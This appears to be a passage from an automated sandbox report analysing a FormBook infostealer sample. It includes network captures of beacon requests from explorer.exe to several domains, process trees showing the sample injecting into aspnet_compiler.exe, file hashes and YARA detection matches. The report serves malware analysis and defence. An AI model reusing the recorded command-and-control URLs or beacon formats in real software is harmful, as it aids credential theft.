May 25, 2022 11:46:40.458136082 CEST	6336	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.0 X-Powered-By: ASP.NET Date: Wed, 25 May 2022 09:46:37 GMT Connection: close Content-Length: 1245 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name change
May 25, 2022 11:46:40.458157063 CEST	6336	IN	Data Raw: 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d Data Ascii: d, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49801	34.117.168.233	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 25, 2022 11:46:45.563656092 CEST	7159	OUT	GET /ocgr/?q48d=SN6PFzMPJRoDS&5jm=kiCgFP8+acxhLHZoy8gx31rwxGvurJ2lCG9zpi5owq94JNIuYWHK8T6MP/53pnYYpwC2n0A2jw== HTTP/1.1 Host: www.attmleather.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 25, 2022 11:46:45.633441925 CEST	7165	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 25 May 2022 09:46:45 GMT Content-Length: 0 location: https://www.attmleather.com/ocgr?q48d=SN6PFzMPJRoDS&5jm=kiCgFP8+acxhLHZoy8gx31rwxGvurJ2lCG9zpi5owq94JNIuYWHK8T6MP%2F53pnYYpwC2n0A2jw%3D%3D strict-transport-security: max-age=3600 x-wix-request-id: 1653472005.5753618648630500 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3 X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMdzREdwWFGtelBi+SI1opzt,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRalgOVgs8IR5vONTs2+DkMAh7xOo2JWfZdidOBfM6egA0+joe2GMQJ/MdiMK4Y/vI708SGjCNz0P/bX+SLsAqajlw=,2UNV7KOq4oGjA5+PKsX47Ap6L/PfruwthWYF2FkPoC1YgeUJqUXtid+86vZww+nL,7npGRUZHWOtWoP0Si3wDp0QOitNCwVKivIPSPnFr7RA=,xTu8fpDe3EKPsMR1jrheEFpHdHF66rmNlg9uLmUa3gM=,v8/9RyiPVS5W/0J6Pu/x96tErS6MvaqiFGi6c+wXk8dcdpMht2hzkhBYSgnwKXc/ Cache-Control: no-cache X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10 Via: 1.1 google x-wix-google-ccm: 1 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49802	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 25, 2022 11:46:50.680059910 CEST	7167	OUT	GET /ocgr/?5jm=sK8+WGPg2JRLe3fUQ4xa6L8WlFBJd5xCkWFiCNREvztrzLZiwMdrfToIj+s3oTo1GaSK+fkqdA==&q48d=SN6PFzMPJRoDS HTTP/1.1 Host: www.nagpurmandarin.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 25, 2022 11:46:50.798515081 CEST	7167	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 25 May 2022 09:46:50 GMT Content-Type: text/html Content-Length: 291 ETag: "628d16df-123" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49804	192.185.0.218	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 25, 2022 11:46:56.098459959 CEST	7175	OUT	GET /ocgr/?q48d=SN6PFzMPJRoDS&5jm=tBqLR1P96jAoGzhM/bfMxIqpBnF4XdPQw9HD3GmR5P6T0l65+iRjfJ8EGOisALaFWgEX56fYJg== HTTP/1.1 Host: www.yonatec.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 25, 2022 11:46:56.235699892 CEST	7176	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 25 May 2022 09:46:56 GMT Server: Apache/2.2.15 (CentOS) Location: https://wildcard.hostgator.com/ocgr/?q48d=SN6PFzMPJRoDS&5jm=tBqLR1P96jAoGzhM/bfMxIqpBnF4XdPQw9HD3GmR5P6T0l65+iRjfJ8EGOisALaFWgEX56fYJg== Content-Length: 429 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6c 64 63 61 72 64 2e 68 6f 73 74 67 61 74 6f 72 2e 63 6f 6d 2f 6f 63 67 72 2f 3f 71 34 38 64 3d 53 4e 36 50 46 7a 4d 50 4a 52 6f 44 53 26 61 6d 70 3b 35 6a 6d 3d 74 42 71 4c 52 31 50 39 36 6a 41 6f 47 7a 68 4d 2f 62 66 4d 78 49 71 70 42 6e 46 34 58 64 50 51 77 39 48 44 33 47 6d 52 35 50 36 54 30 6c 36 35 2b 69 52 6a 66 4a 38 45 47 4f 69 73 41 4c 61 46 57 67 45 58 35 36 66 59 4a 67 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 6f 6e 61 74 65 63 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wildcard.hostgator.com/ocgr/?q48d=SN6PFzMPJRoDS&5jm=tBqLR1P96jAoGzhM/bfMxIqpBnF4XdPQw9HD3GmR5P6T0l65+iRjfJ8EGOisALaFWgEX56fYJg==">here</a>.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.yonatec.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49805	162.241.253.231	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 25, 2022 11:47:01.632725954 CEST	7177	OUT	GET /ocgr/?5jm=9V0bXTkkxKWxDgp6RJOks70x/YcJP31kraxWgvuUzaENE/wb1OUHkodtz4aPYkPCWgKnca4quw==&q48d=SN6PFzMPJRoDS HTTP/1.1 Host: www.tubesing.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 25, 2022 11:47:01.900049925 CEST	7178	IN	HTTP/1.1 404 Not Found Date: Wed, 25 May 2022 09:47:01 GMT Server: nginx/1.19.10 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 Transfer-Encoding: chunked Data Raw: 31 65 37 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 0a 09 09 09 57 65 6c 63 6f 6d 65 20 26 6d 64 61 73 68 3b 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 09 09 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 0a 09 09 09 73 72 63 3d 22 68 74 74 70 3a 2f 2f 32 62 73 69 6e 67 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 68 74 74 70 3a 2f 2f 32 62 73 69 6e 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 62 6c 75 65 68 6f 73 74 2d 77 6f 72 64 70 72 65 73 73 2d 70 6c 75 67 69 6e 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 63 73 2d 62 6c 75 65 68 6f 73 74 2d 62 67 2e 6a 70 67 22 29 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 74 6f 70 20 72 69 67 68 74 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 7d 0a 0a 09 09 09 2a 20 7b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 69 6e 70 75 74 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 7d 0a 0a 09 09 09 3a 3a 2d 77 65 62 6b 69 74 2d 69 6e 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 39 44 41 46 42 44 3b 0a 09 09 09 7d 0a 0a 09 09 09 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 39 44 41 46 42 44 3b 0a 09 09 09 7d 0a 0a 09 09 09 3a 2d 6d 73 2d 69 6e Data Ascii: 1e7c<!DOCTYPE html><html lang="en-US"><head><meta name="viewport" content="width=device-width"><title>Welcome — Coming Soon</title><meta name="robots" content="noindex, nofollow" /><scriptsrc="http://2bsing.com/wp-includes/js/jquery/jquery.js"></script><link href="https://fonts.googleapis.com/css?family=Open+Sans:400,600" rel="stylesheet"><style type="text/css">body {background-color: #fff;background-image: url("http://2bsing.com/wp-content/plugins/bluehost-wordpress-plugin/static/images/cs-bluehost-bg.jpg");background-position: top right;background-repeat: no-repeat;font-family: "Open Sans", sans-serif;overflow-x: hidden;}* {box-sizing: border-box;-moz-box-sizing: border-box;-webkit-box-sizing: border-box;}input {font-family: "Open Sans", sans-serif;}::-webkit-input-placeholder {color: #9DAFBD;}::-moz-placeholder {color: #9DAFBD;}:-ms-in
May 25, 2022 11:47:01.900129080 CEST	7179	IN	Data Raw: 70 75 74 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 39 44 41 46 42 44 3b 0a 09 09 09 7d 0a 0a 09 09 09 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 39 44 41 Data Ascii: put-placeholder {color: #9DAFBD;}:-moz-placeholder {color: #9DAFBD;}#wrap {max-width: 560px;margin: 320px auto 120px;color: #444;text-align: center;}#wrap h1 {font-weight: 300;
May 25, 2022 11:47:01.900176048 CEST	7181	IN	Data Raw: 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 62 74 6e 3a 68 6f 76 65 Data Ascii: r-radius: 3px;text-decoration: none;margin-top: 60px;}.btn:hover {border: 1px solid #2e66ba;background-color: #fff;color: #2e66ba;}.bh_subscription_widget {}.bh_subscription_widget h2.widgett
May 25, 2022 11:47:01.900222063 CEST	7182	IN	Data Raw: 6f 6e 3a 20 61 6c 6c 20 30 2e 31 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 09 09 09 09 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 30 2e 31 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 0a 09 09 09 09 2d 6f 2d 74 72 61 6e 73 69 Data Ascii: on: all 0.1s ease-in-out;-moz-transition: all 0.1s ease-in-out;-o-transition: all 0.1s ease-in-out;transition: all 0.1s ease-in-out;}.bh_subscription_widget form .bh-inputs.email.active #bh-subscribe-label {color:
May 25, 2022 11:47:01.900254965 CEST	7184	IN	Data Raw: 20 66 6f 72 6d 20 2e 62 68 2d 69 6e 70 75 74 73 2e 73 75 62 6d 69 74 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 35 37 35 44 33 3b 0a 09 09 09 09 Data Ascii: form .bh-inputs.submit input[type="submit"] {background-color: #3575D3;border: none;border-radius: 4px;color: #fff;font-size: 14px;font-weight: 600;line-height: 13px;margin: 0;padding: 15px 30px;
May 25, 2022 11:47:01.900304079 CEST	7185	IN	Data Raw: 64 67 65 74 20 66 6f 72 6d 20 2e 62 68 2d 69 6e 70 75 74 73 2e 73 75 62 6d 69 74 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 20 7b 0a 09 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2e 62 Data Ascii: dget form .bh-inputs.submit input[type="submit"] {width: 100%;}.bh_subscription_widget form .bh-inputs.email input[type="email"] {min-width: 0;}.bh_subscription_widget form .bh-inputs {margin-bottom: 10p
May 25, 2022 11:47:01.900338888 CEST	7185	IN	Data Raw: 28 29 3b 0a 09 09 09 09 09 76 61 72 20 61 6a 61 78 73 63 72 69 70 74 20 3d 20 7b 61 6a 61 78 5f 75 72 6c 3a 20 27 68 74 74 70 73 3a 2f 2f 32 62 73 69 6e 67 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 27 7d Data Ascii: ();var ajaxscript = {ajax_url: 'https://2bsing.com/wp-admin/admin-ajax.php'}$.ajax({type: 'POST',
May 25, 2022 11:47:01.900377989 CEST	7186	IN	Data Raw: 33 65 61 0d 0a 09 75 72 6c 3a 20 61 6a 61 78 73 63 72 69 70 74 2e 61 6a 61 78 5f 75 72 6c 2c 0a 09 09 09 09 09 09 64 61 74 61 3a 20 7b 0a 09 09 09 09 09 09 09 27 61 63 74 69 6f 6e 27 3a 20 27 6d 6f 6a 6f 5f 63 6f 6d 69 6e 67 5f 73 6f 6f 6e 5f 73 Data Ascii: 3eaurl: ajaxscript.ajax_url,data: {'action': 'mojo_coming_soon_subscribe','email': email,'nonce': nonce},success: function (response) {var status = response.status;if (status ==

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: jwRbEDUUZC.exePID: 1548, Parent PID: 2576

General

Target ID:	0
Start time:	11:45:00
Start date:	25/05/2022
Path:	C:\Users\user\Desktop\jwRbEDUUZC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\jwRbEDUUZC.exe"
Imagebase:	0x30000
File size:	599088 bytes
MD5 hash:	F177FEE6286DC51D2BAF18D07C92D216
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.373668020.00000000035FC000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: aspnet_compiler.exePID: 6272, Parent PID: 1548

General

Target ID:	1
Start time:	11:45:02
Start date:	25/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x760000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.458062573.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.371851439.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.371477540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.457956681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security 